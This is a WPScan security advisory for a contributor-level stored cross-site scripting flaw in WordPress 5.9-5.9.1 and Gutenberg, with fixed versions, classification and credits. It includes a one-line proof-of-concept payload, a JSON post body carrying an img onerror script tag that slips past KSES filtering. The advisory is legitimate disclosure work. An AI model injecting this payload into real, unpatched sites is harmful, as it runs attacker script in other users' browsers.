WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WordPress (5.9-5.9.1) / Gutenberg (9.8.0-12.7.1) - Contributor+ Stored Cross-Site Scripting

Description

Post authors are able to bypass KSES restrictions in WordPress >= 5.9 (and or Gutenberg >= 9.8.0) due to the order filters are executed, which could allow them to perform to Stored Cross-Site Scripting attacks

Proof of Concept

As a user without the UNFILTERED_HTML capability, create a post containing the following content:

{"version":"u003cimg src=404 onerror=alert(document.location)u003e","isGlobalStylesUserThemeJSON":"foobar"}

Affects WordPress

5.9.1
Fixed in version 5.9.2
5.9
Fixed in version 5.9.2

Affects Plugins

gutenberg
Fixed in version 12.7.2

References

URL
https://wordpress.org/news/2022/03/wordpress-5-9-2-security-maintenance-release/

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Ben Bidner

Verified

Yes

WPVDB ID
1fd6742e-1a32-446d-be3d-7cce44f8f416

Timeline

Publicly Published

2022-03-11 (about 1 years ago)

Added

2022-03-11 (about 1 years ago)

Last Updated

2022-04-12 (about 11 months ago)

Our Other Services

WPScan WordPress Security Plugin